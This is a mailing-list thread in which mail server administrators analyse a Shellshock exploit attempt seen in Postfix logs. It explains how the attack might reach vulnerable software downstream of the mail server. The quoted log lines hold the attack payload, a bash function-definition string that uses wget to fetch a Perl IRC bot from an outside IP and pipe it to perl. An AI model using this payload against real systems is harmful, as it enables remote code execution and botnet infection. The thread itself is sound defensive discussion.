Re: [mailop] new exploit?
On 2023-01-14 at 17:33 +0200, Mary wrote: > Thank you, I'll take a closer look, because Shellshock implies that > somehow the SMTPD executes a bash script, which I find highly > unlikely. That is why I thought they are trying to exploit something > further down the pipeline (Logstash, Prometheus, etc). The command is a normal shellshock payload. It would seems to target the case where the mail server or an MDA sets an environment variable with the MAIL FROM value and then executes a command through bash. This could be the execution of a milter, a procmail... courier also extensively uses environment variables between their programs. The most difficult part is that a bash shell is executed... being an old version which not patched for this 2014 vulnerability. ___ mailop mailing list mailop@mailop.org https://list.mailop.org/listinfo/mailop
Re: [mailop] new exploit?
Mary via mailop skrev den 2023-01-14 16:33: Thank you, I'll take a closer look, because Shellshock implies that somehow the SMTPD executes a bash script, which I find highly unlikely. That is why I thought they are trying to exploit something further down the pipeline (Logstash, Prometheus, etc). postfix does not run anything in master.cf as root postfix postscreen kill this bot before it even do smtp ___ mailop mailing list mailop@mailop.org https://list.mailop.org/listinfo/mailop
Re: [mailop] new exploit?
On 2023-01-14 at 09:16:05 UTC-0500 (Sat, 14 Jan 2023 16:16:05 +0200) Mary via mailop is rumored to have said: Within the past several days, I've been monitoring a kind of exploit that affects the 'from' RCPT part of the smtp conversation: ``` postfix/postscreen[633104]: PREGREET 8 after 0.09 from [159.89.232.70]:52350: HELO x\r\n postfix/postscreen[633104]: NOQUEUE: reject: RCPT from [159.89.232.70]:52350: 550 5.5.1 Protocol error; from=<() { :; }; wget -qO - 193.56.28.202/botF|perl>, to=, proto=SMTP, helo= postfix/postscreen[633104]: DATA without valid RCPT from [159.89.232.70]:52350 ``` Does anyone know what kind of software is the target of this attack? It's a very lame attempt to exploit ShellShock. "Very lame" because that vulnerability is surely saturated by now (i.e. all vulnerable systems were popped years ago) and it didn't wait for the banner or give a minimally valid HELO, behavior that good mailservers have been shunning for almost 20 years now. It's a demo in "spammers & malware users are generally stupid." Obviously, its not postfix, which quickly drops the connection. Could it be some kind of software that parses logs? Hard to say, since obviously they also had more payload (else why try DATA?) ShellShock attacks are grossly untargeted because the ways that mail (and web) servers make themselves vulnerable by errors in configuration are widely variable. They don't care if a particular MTA is Postfix 3.7 or Sendmail 5.2, because some mail admin might have had a lapse in configuration rigor on either. I'd appreciate your thoughts. PS: the payload is a perl IRC bot ___ mailop mailing list mailop@mailop.org https://list.mailop.org/listinfo/mailop -- Bill Cole b...@scconsult.com or billc...@apache.org (AKA @grumpybozo and many *@billmail.scconsult.com addresses) Not Currently Available For Hire ___ mailop mailing list mailop@mailop.org https://list.mailop.org/listinfo/mailop
Re: [mailop] new exploit?
Thank you, I'll take a closer look, because Shellshock implies that somehow the SMTPD executes a bash script, which I find highly unlikely. That is why I thought they are trying to exploit something further down the pipeline (Logstash, Prometheus, etc). On Sat, 14 Jan 2023 14:41:17 + Collider via mailop wrote: > I received one of these bad girls to my Nightmare Mail (fork of notqmail), > albeit with a different argument to the attempted wget command (which was > never processed, though my mailserver was able to successfully make delivery > of this technically non-compliant message). It seems to my friends to be an > attempt to exploit Shellshock. ___ mailop mailing list mailop@mailop.org https://list.mailop.org/listinfo/mailop
Re: [mailop] new exploit?
I received one of these bad girls to my Nightmare Mail (fork of notqmail), albeit with a different argument to the attempted wget command (which was never processed, though my mailserver was able to successfully make delivery of this technically non-compliant message). It seems to my friends to be an attempt to exploit Shellshock. On 14 January 2023 14:16:05 UTC, Mary via mailop wrote: > >Within the past several days, I've been monitoring a kind of exploit that >affects the 'from' RCPT part of the smtp conversation: > >``` >postfix/postscreen[633104]: PREGREET 8 after 0.09 from [159.89.232.70]:52350: >HELO x\r\n >postfix/postscreen[633104]: NOQUEUE: reject: RCPT from [159.89.232.70]:52350: >550 5.5.1 Protocol error; from=<() { :; }; wget -qO - >193.56.28.202/botF|perl>, to=, proto=SMTP, helo= >postfix/postscreen[633104]: DATA without valid RCPT from [159.89.232.70]:52350 >``` > >Does anyone know what kind of software is the target of this attack? > >Obviously, its not postfix, which quickly drops the connection. Could it be >some kind of software that parses logs? > >I'd appreciate your thoughts. > >PS: >the payload is a perl IRC bot >___ >mailop mailing list >mailop@mailop.org >https://list.mailop.org/listinfo/mailop -- Sent from my Android device with K-9 Mail. Please excuse my brevity.___ mailop mailing list mailop@mailop.org https://list.mailop.org/listinfo/mailop
[mailop] new exploit?
Within the past several days, I've been monitoring a kind of exploit that affects the 'from' RCPT part of the smtp conversation: ``` postfix/postscreen[633104]: PREGREET 8 after 0.09 from [159.89.232.70]:52350: HELO x\r\n postfix/postscreen[633104]: NOQUEUE: reject: RCPT from [159.89.232.70]:52350: 550 5.5.1 Protocol error; from=<() { :; }; wget -qO - 193.56.28.202/botF|perl>, to=, proto=SMTP, helo= postfix/postscreen[633104]: DATA without valid RCPT from [159.89.232.70]:52350 ``` Does anyone know what kind of software is the target of this attack? Obviously, its not postfix, which quickly drops the connection. Could it be some kind of software that parses logs? I'd appreciate your thoughts. PS: the payload is a perl IRC bot ___ mailop mailing list mailop@mailop.org https://list.mailop.org/listinfo/mailop